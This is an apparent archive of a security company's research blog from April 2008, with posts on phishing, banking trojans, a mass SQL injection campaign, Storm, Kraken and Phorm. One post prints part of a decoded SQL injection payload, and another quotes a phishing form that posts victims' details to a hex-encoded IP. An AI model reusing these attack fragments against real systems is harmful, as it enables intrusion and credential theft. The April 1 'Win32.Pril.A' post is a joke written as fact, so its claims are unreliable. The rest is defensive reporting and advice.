NEWS FROM THE LAB - April 2008


Wednesday, April 30, 2008

Try our Latest Technology Posted by Sean @ 11:48 GMT

Internet Security 2009 Beta was released on April 28th.

Internet Security 2009 Beta

IS 2009 contains many new features including DeepGuard 2.0 and new engine technologies.

Internet Security 2009 Beta

There's been a great deal of work put into our back-end systems that will directly impact the effectiveness of IS 2009. We're looking forward to its potential here in the lab.

The readership of this blog has been a very useful resource to the Internet Security project team in the past. They welcome you to try out 2009 and to provide feedback. Those that provide excellent feedback will be entered into a drawing. The team is still determining the prizes (it's budgeting time) but will probably come up with a couple of cool iPods and some free twelve-month licenses.

You can read the current release notes and sign up for the download from our Technology Preview pages.

And while on the topic of new technologies… if you don't have a machine to test our new beta, you can still try some of the technologies that will be included in Internet Security 2009.

Online Scanner3.3.0

Our Online Scanner 3.3.0 was released with a new mix of technologies.

It's *free* to use (requires Internet Explorer). Custom Scan options are possible. You can scan your entire system or a single folder.

Online Scanner 3.3.0 Custom Options

Try Online Scanner from our support pages. If you're curious about some of changes made, check out the details in the scan report.


Monday, April 28, 2008

DDoS Anniversary Posted by Sean @ 14:34 GMT

There was a "cyberwar" in Estonia one year ago. Civil unrest, protests, and rioting culminated in DDoS attacks against Estonian government websites. What started on the streets moved online with those that couldn't be physically present taking part in DDoS attacks that lasted for more than a week.

We blogged about the attacks here (April 28th), here (April 30th), and here (May 9th).

There were plenty of DDoS tools distributed during the attacks:

April 2007

The anniversary of the riots haven't generated any activity as of yet and we don't expect anything significant later.

More recent failed examples appear to indicate that a good deal of offline heat is required before online attacks catch fire.

An "e-jihad" planned for the 11th of November never materialized.

And earlier this month a DDoS attack planned against CNN resulted in only random outages, mostly in Asia.

Anti-CNN tools were distributed… but without street protests to really capture people's attention, nothing carried-over to online attacks.



Friday, April 25, 2008

Fly Phishing Posted by Sean @ 18:12 GMT

Some phishing gangs have a new technique. They're using trojan-spy applications.

Last week we received the following e-mail message:

Comerica Phishing E-mail

Notice that the message doesn't mention anything about providing an account-name or password.

Instead, it attempts to convince the recipient that they need to install a Digital Certificate for enhanced safety.
(Anybody want to buy a bridge?)

The message links to a site with the following:

Comerica Phishing Site

It's basically a page full of jargon designed to overwhelm the potential victim. What happens if the victim falls for the bait and installs the "certificate"? A trojan-spy will be installed.

So now the phishers don't need to ask for passwords anymore, they can just take them.

This technique keeps the classic element of phishing by mimicking the trusted institution — the bank. What they've adjusted is the part that people have become skeptical of, which is giving away their password when requested by e-mail.

Update: Here's a brief video that we captured last week when the site was online. You'll find it on the Lab's YouTube Channel.

Thursday, April 24, 2008

Mass SQL Injection Posted by Patrik @ 03:59 GMT

There's another round of mass SQL injections going on which has infected hundreds of thousands of websites.

Performing a Google search results in over 510,000 modified pages.

Google Search Results for SQL Injections

As more and more websites are using database back-ends to make them faster and more dynamic, it also means that it's crucial to verify what information gets stored in or requested from those databases — especially if you allow users to upload content themselves which happens all the time in discussion forums, blogs, feedback forms, et cetera.

Unless that data is sanitized before it gets saved you can't control what the website will show to the users. This is what SQL injection is all about, exploiting weaknesses in these controls. In this case the injection code starts off like this (note, this is not the complete code):


Which when decoded becomes:

   DECLARE @T varchar(255)'@C varchar(255) DECLARE Table_Cursor
   CURSOR FOR select' from sysobjects a'syscolumns b
   where and a.xtype='u' and (b.xtype=99 or b.xtype=35
   or b…

What happens as a result? It finds all text fields in the database and adds a link to malicious javascript to each and every one of them which will make your website display them automatically. So essentially what happened was that the attackers looked for ASP or ASPX pages containing any type of querystring (a dynamic value such as an article ID, product ID, et cetera) parameter and tried to use that to upload their SQL injection code.

So far three different domains have been used to host the malicious content —, and There's a set of files that gets loaded from these sites that attempts to use different exploits to install an online gaming trojan. Right now the initial exploit page on all domains are unaccessible but that could change. So if you're a firewall administrator we recommend you to block access to them.

So what should you do?

First of all, search your website logs for the code above and see if you've been hit. If so, clean up your database to prevent your website visitors from becoming infected. Second, make sure that all the data you pass to your database is sanitized and that no code elements can be stored there. Third, block access to the sites above. Fourth, make sure the software you use is patched, F-Secure Health Check is an easy way to do this. Fifth, keep your antivirus solution up-to-date.

UPDATE: We've received some questions on the platform and operating systems affected by this attack. So far we've only seen websites using Microsoft IIS Web Server and Microsoft SQL Server being hit. Do note that this attack doesn't use vulnerabilities in any of those two applications. What makes this attack possible is poorly written ASP and ASPX (.net) code.

Monday, April 21, 2008

Home Server Security Beta Posted by Sean @ 16:16 GMT

We have a new beta available in our Technology Preview Program:

Home Server Security

Home Server Security Beta

The best beta testers will receive a free twelve-month subscription. So if you have Windows Home Server, come give it a try.

Your feedback is invaluable. Cheers!

P.S. The Technology Preview Program currently has two other options including the March 31st release of Health Check. Reader feedback has been very useful there so please check it out if you haven't already.


Friday, April 18, 2008

E-spionage Posted by Sean @ 17:35 GMT

Espionage Trojans:

On Monday SANS Internet Storm Center wrote about a targeted attack against CEOs. The e-mail messages were directly sent to senior corporate executives and properly identified them by name. The message claimed their testimony was required in a corporate lawsuit. If they clicked through on the link to read the supposed subpoena they were then asked to install a file.

And if they ran the file? Then they were really installing a trojan-spy designed to steal certificates. Here's the description of what we detect as Trojan-Spy:W32/Small.BSL.

On Wednesday Dan Goodin reported that the attack repeated itself with some additional successes.

We've been watching the evolution of targeted attacks for about two years now. Hopefully this recent press coverage helps to shed some light on a very serious issue.

One of our recent posts linked to the Businessweek article "The New E-spionage Threat". If you haven't read it yet, take the time to do so this weekend.

No time? Then at least grab yourself their Behind the Cover podcast from here.



Thursday, April 17, 2008

HITBSecConf2008 Dubai Posted by Jose @ 16:39 GMT

Greetings from Dubai!Hack In The Box Dubai 2008

The two-day HITB Security Conference just ended (today) and I've got lots of cool stuff for you.

Ero Carrera, Zynamics GmbH: Day one with "Malware — Behavior, Tools, Scripting and Advanced Analysis" presented a Python extension for Bochs, an open source CPU emulator that can be found at According to Ero, some malware such as Storm usually make a call to some ancient APIs. It uses the return values as part of its decryption routine, which cannot be reproduced by sand-boxing and therefore doesn't end up in the decryption part of the malware. Using a full emulator such as Bochs, can bypass most of the anti-vmware tricks.

Jim Geovedi: "Hijacking VSAT Connections" was an update on a previous HITB presentation called "Hacking a Bird in The Sky: Hijacking VSAT Connections". Jim presented ways to defeat detections from local government agencies and also added that this hijacking can also be done via MACs, not only IPs.

Dino Covotsos from Telspace Systems practically showed various method of exploiting Bluetooth technology with some freely available tools. Imagine an attacker that can read and send SMS and make some premium phone calls without your knowledge. He even mentioned F-Secure a few times in his presentation, "Hacking the Bluetooth Stack for Fun, Fame and Mayhem".

With Bruce Schneier, as keynote speaker on day one tackling the feeling of security and Jeremiah Grossman on day two with some nice yet scary statistics on website hacks; this has been a great two-day Security Conference here in Dubai.

Signing off,


Cambridge, Tampere and Turku Posted by Mikko @ 07:58 GMT

On the topic of Universities and academic research… here are two recently published theses that are relevant to antivirus research.

Mikko   Timo

Interesting stuff.

Then the bad news; only the summaries of these documents are in English. Sorry.

And while we're still on the topic: I'll be giving a lecture at Cambridge University next week. Hey, that's going to look nice on my bio.

Drop by if you're in the neighborhood. More info from

University of Cambridge

Signing off,

Wednesday, April 16, 2008

Malware Analysis Course Coming to a Close Posted by Antti @ 11:56 GMT

We've been running a course at the Helsinki University of Technology covering malware analysis and antivirus technologies (we blogged about this earlier this year).

We've had many lecturers from our Security Lab giving talks on various topics during the spring. Here's Mika Ståhlberg talking about antivirus engines:

Mika Stahlberg giving a lecture on AV engine design

As soon as we announced that we were running such a unique course, we received lots of questions about the material. So now we're happy to announce that all the course material from the lectures are publicly available from the course webpage.

Now the course is coming to a close. The students are currently working on their final project: designing and implementing an antivirus engine. While this sounds like a daunting task (it takes a lot of time to develop a good engine), we are keeping things reasonable. The main focus is on coming up with a sound design and implementing a basic engine to test it out.

Our students have been very successful in different homework assignments such as reverse engineering puzzles, manual disassembly, emulators, and tackling anti-debugging tricks, so we're sure they'll do an excellent job with their projects as well. You can try your own skills on the homework assignments here. Do note that all the test samples available for download are harmless.

Course homework

We wish good luck to all the students with their final projects!


Tuesday, April 15, 2008

Phorm Factor Posted by Stefan @ 09:13 GMT

For some time now, several ISPs in UK have been lobbied by an advertising company called Phorm. The online advertising business generates a great deal of revenue and so it's easy to listen to riches and fortune when opportunity knocks. But is the potential opportunity worth the potential risk to privacy?
Phorm's technology is a tracking solution for ISPs that would enable the display of contextual advertisements. When ISP subscribers browse the web, their content will be "deep packet" scanned to gather information about their interests. Advertisement banners will then be selected based on those interests.

The effect is similar to most adware solutions today — except it's installed on your ISP instead of your home computer.

During the summer of 2007 a large UK ISP did a trial of Phorm's technology. Thousands of customers' browsing habits were monitored. Whether the information was used, stored or shared with Phorm is unclear. Currently no ISP has this technology in use, but several in UK have signed up as partners with Phorm.

Because the technology uses a cookie to identity each user, most antivirus vendors have the possibility of creating a signature and can wipe the tracks of monitored interests. Based on the descriptions of the deployment (opt-out) and the technology we lean towards creating such a detection signature for the cookie. The same stance has been given by many other security vendors and we all pull for a secure opt-in solution.

It has also come to our attention that Phorm was previously known as 121Media.

121Media was the company behind the brand PeopleOnPage. PeopleOnPage is the friendly wrapper around the advertisement engine ContextPlus. Another wrapper was called Apropos, which was one of the most widespread malicious rootkits of 2005. In 2006 the heat was too much and they shut it down. DNS registrars and website content supported that they were all in it together.

Using multiple brands and not having full disclosure is common in the adware business. Renaming a company to clear a bad reputation has also been seen before.

In the media war against Phorm, they always come back to their extreme measures not to include personal or privacy sensitive data. Even if they have good measurements for this today — it doesn't mean it won't change tomorrow. Ernst and Young scrutinized their technology earlier and now 80/20 Thinking is also giving it a review — but who will look into their future upgrades after they've already sold it to the ISPs?

For our London based readers, there is a public event this evening (Tuesday) where you can ask Kent Ertugrul about Apropos and ContextPlus.


   How many users did ContextPlus had?
   If Apropos is installed on my home computer, from where can I get assistance on how to uninstall it?
   What was the intension of the rootkit/stealth technology in Apropos?
   Why should we trust Phorm?


Monday, April 14, 2008

RSA 2008 Posted by Sean @ 15:52 GMT

We were in San Francisco last week attending RSA 2008. It's a *big* conference.

Here's a short video clip of the audience to give some idea just how big it is:

RSA 2008

Mikko delivered a presentation on Espionage Trojans. Here's some related media coverage from Wired and Businessweek.

Afterwards, Martin of Network Security Podcast and Mikko had a chat about banking trojans and some other recent issues. You can download the MP3 audio file from here.


Wednesday, April 9, 2008

Kraken, Not New But Still Newsworthy? Posted by Jusu @ 12:31 GMT

There's recently been quite much fuss about a botnet of spam trojans dubbed Kraken.

There've been some claims that the botnet is the biggest currently out there, massing over 400,000 infected computers. Most vendors in the industry have been wondering about the numbers, which seem to be a bit bloated when taking a look at received samples.

Yesterday, Brian Krebs of Security Fix revealed that Damballa, the initial breaker of the Kraken story, has hijacked some of Kraken's domain names and are using the hijacked DNS resource records to count infections.

After a little bit of digging, we found one of the hostnames that Kraken uses: [censored] It currently resolves to an IP address owned by the Georgia Institute of Technology, which is where Damballa resides.

We first saw earlier variants of this particular malware around the summer of 2006, so it's not exactly breaking news. It's possible that the statistics collected from this DNS trap include old, now dysfunctional variants and thus bloating the amount of "new" Kraken infections.

There are many detection names for "Kraken"; Oderoor, Bobax, Agent, and many more. We believe that there is a single group of people behind Karken, updating their malware as time goes by. It's not new, it's just a new generation of something older. The latest variant is detected as: Trojan.Win32.Obfuscated.GY.

Updated to Add: Those interested in reading Damballa's point of view will find a link in this post's comments.


April's Updates from Microsoft Posted by Esz @ 03:22 GMT

It's the second Tuesday of the month again and — it's once again time for scheduled updates from Microsoft.

There are five critical and three important updates this month.

April's Microsoft Updates

The vulnerabilities released by Microsoft for April's Patch Tuesday are:

— Microsoft Windows Kernel Privilege Escalation Vulnerability
— Microsoft Windows hxvz.dll ActiveX Control Memory Corruption
— Microsoft Windows GDI Image Parsing Buffer Overflows
— Microsoft Windows DNS Client Predictable Transaction ID Vulnerability
— Microsoft Visio Two File Processing Vulnerabilities
— Microsoft Project Unspecified Code Execution Vulnerability
— Internet Explorer Data Stream Handling Vulnerability and
— Microsoft VBScript/JScript Script Decoding Buffer Overflow

For more information, you can go read the Security Bulletin.

Make sure you have the most secure and updated application versions available for your computer. It's always better to be safe than sorry.

You can also do a PC Health Check (IE 6 and above) to determine the wellbeing of your computer.


Monday, April 7, 2008

IC3's 2007 Internet Crime Report Posted by Sean @ 16:29 GMT

Malicious software and frauds are very closely related. Malware research frequently leads to our discovering new ways with which to scam victims. So we're often reading up on the topic…

The USA's Internet Crime Complaint Center (IC3) is a partnership between the FBI and the National White Collar Crime Center (NW3C). Last week the IC3 released its Annual Report for 2007. You can download a copy from here.

The report is fairly interesting reading. Besides the statistics based on its casework, the report also details a number of popular scams such as:

Pet Scams
Secret Shopper and Funds Transfer Scams
Adoption Fraud (Charity Fraud)
Romance Fraud

The Scam Synopsis also refers to a site called Looks Too Good To Be True that may be of interest to weblog readers. "Looks Too Good" details current scams and provides FAQs and Tips.

2007 Internet Crime Report -


Storm Blogs Posted by Ian @ 08:26 GMT

Storm has once again turned its eye to the blogging community, specifically the community.

Several blogger sites with random or very quirky names have been sporting a love theme, Storm style. These sites appear to have been created solely for Storm's purposes and no legitimate blogger site has of yet been reported as infected.

Visiting these sites will lead you to another page, while keeping the Blogger menu at the top.


Clicking the site's image downloads a file called love.exe while clicking the link will provide withlove.exe.

All files are detected as Email-Worm.Win32.Zhelatin.WW since database update 2008-04-06_02.

Sunday, April 6, 2008

Gone Phishing Posted by Mikko @ 22:28 GMT

Somebody is spamming around mails that look like this:

From ""
Date: Sun, 6 Apr 2008 06:56:47 +0900

For security reasons we have sent the message as an attachment file.
This measure has been adopted to prevent personal information theft and data loss.

ож Moneybookers Ltd. All Rights Reserved. Use of this Web site is subject to our Terms and Conditions.
Registered in England and Wales under Company No 4260907. Registered office:
Welken House, 10-11 Charterhouse Square, London, EC1M 6EH.
None of the information contained in this website constitutes, nor should be construed as Financial Advice.
Internal complaint handling procedures can be requested by contacting our Customer Service Department.


The attachment is an HTML file, asking the user to participate in a Money Launder Prevention program:


When looking at the source code, we can see that the HTML file loads all the components from — the real site… but the Form POST function looks funky:

   form method="POST" action="http://0xCA909D9D/HTML/" style="text-align: left"

Hmmm. 0xCA909D9D. That's a weird way of presenting an IP address.

Lets see where this goes.


But of course. Turns out it's the site of the Anti-corruption commission of Bhutan:


The commission has been informed that they've been hacked.

Friday, April 4, 2008

Ms. Polinka Wants Your Bank Account Posted by Mikko @ 11:00 GMT

There's been a banking trojan spam run in four European countries this morning. The targeted countries are The Netherlands, Switzerland, Latvia, and Finland.

The e-mails claim to be from a Russian student girl looking for a local sex partner — or failing that, just a friend. The mail urges the recipient to check her photos on a site called (in China).

Unfortunately, the site only has thumbnails of Ms. Polinka's pictures; if you try to view the larger images you're prompted by an error message of a missing plug-in that you supposedly need. The plug-in of course is the malware itself — a manual man-in-the-middle banking trojan.

Here's what the sites look like in different languages:





This malware is very closely related to the so called "Mikkeli" case, found in February.

We detect the malware as Trojan-Spy:W32/Zbot.KZ. More information is available in the Zbot.HS description.


Wednesday, April 2, 2008

You've Been IFramed Posted by Ian @ 11:09 GMT

Injected IFrames into legitimate sites are becoming more and more common. One of the latest targets is a Chinese government site at


Please note that while the site administrators have been notified, the injected IFrame is still present on the site at the time of this posting.

The IFrame downloads a page from another Chinese site that redirects the browser to a .com site — that contains tons of new IFrames.

The end result of this IFrame jungle is that exploits attempt to download executables to the user's computer:


Both of these files are already detected as Trojan-Downloader.Win32.Small.SUU by our latest database updates.

Drive-by-downloads are getting more sophisticated nowadays with this case as an example using several exploits including MDAC and Real Player exploits.

As always, remember to practice safe computing even when on familiar grounds, lest you find yourself IFramed.

Updated to add — Breaking News: Turns out that seems to have similar IFrame's added to some of its pages as well. We have been in touch with Sony and CERTs on this.

Tuesday, April 1, 2008

Unusual Banking Trojan Found Today Posted by Mikko @ 07:22 GMT

We've seen tons of banking trojans lately, but now we've run into something quite unique.

This new banking trojan was found today from a drive-by-download site. We've added detection for it as Win32.Pril.A.

It not only infects the MBR of the machine, but also re-flashes the boot code in the Flash BIOS, making disinfection problematic.

Once an infected machine is online, the trojan monitors the user's actions, waiting him to go to go to one of several hundred online banks, located all over the world.

Sample XML

Once the user has logged on, the banking trojan uses PCMCIA to inject code into the VGA! As an end result, the trojan creates a man-in-the-browser attack against the victim.

Now, the really surprising part is what the trojan does. Normal banking trojans would insert extra transactions or change the deposit account numbers on-the-fly. However, Win32.Pril.A doesn't withdraw money from you — it actually inserts money TO your account. This looked so weird we had to test it several times, on all of our accounts.

The drive-by-download site is still up. Normally, we wouldn't list the URL for such a site, or we would at least obfuscate it in a screenshot. However this time we'll make an exception. We will even make the link clickable: